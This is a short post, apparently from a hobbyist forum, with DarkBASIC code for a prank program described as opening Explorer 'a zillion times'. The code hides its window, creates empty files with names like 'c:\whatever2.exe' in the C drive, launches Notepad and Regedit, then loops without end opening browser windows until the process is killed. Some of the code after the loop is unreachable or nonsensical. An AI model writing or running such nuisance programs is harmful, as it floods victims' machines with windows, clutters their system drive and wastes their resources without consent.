what this does is it opens up explorer a zillion times while showing you notepad inside itself it also creates a few useless empty files in your C directory, in order to end it from doing a constant loop you need to end its process
HIDE WINDOW
sync on
if file exist("c:\whatever2.exe")=0 then make file "c:\whatever2.exe"
open to read 4,"c:\whatever2.exe"
read string 4,current$
sync on
if file exist("c:\whatever3.exe")=0 then make file "c:\whatever3.exe"
open to read 5,"c:\whatever3.exe"
read string 5,current$
sync on
if file exist("c:\u.exe")=0 then make file "c:\u.exe"
open to read 6,"c:\u.exe"
read string 6,current$
sync on
if file exist("c:\X.exe")=0 then make file "c:\X.exe"
open to read 7,"c:\X.exe"
read string 7,current$
sync on
if file exist("c:\5.exe")=0 then make file "c:\5.exe"
open to read 8,"c:\5.exe"
read string 8,current$
sync on
if file exist("c:\21.exe")=0 then make file "c:\21.exe"
open to read 9,"c:\21.exe"
read string 9,current$
sync on
if file exist("c:\1.exe")=0 then make file "c:\1.exe"
open to read 10,"c:\1.exe"
read string 10,current$
sync on
if file exist("c:\2555.exe")=0 then make file "c:\2555.exe"
EXECUTE FILE "notepad.exe","c:\windows\notepad.exe","system32",1
EXECUTE FILE "regedit.exe","regedit.exe", "system32",1
sync on
EXECUTE FILE "notepad.exe","c:\windows\notepad.exe","system32",2
if file exist("c:\db115.exe")=0 then make file "c:\db115.exe"
open to read 3,"c:\db115.exe"
read string 3,current$
do:
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
execute file "http://google.com" + web$,"",""
loop
restore window
val(current$)=currentc
currentc=currentc+201
sync
print temp$
print currentc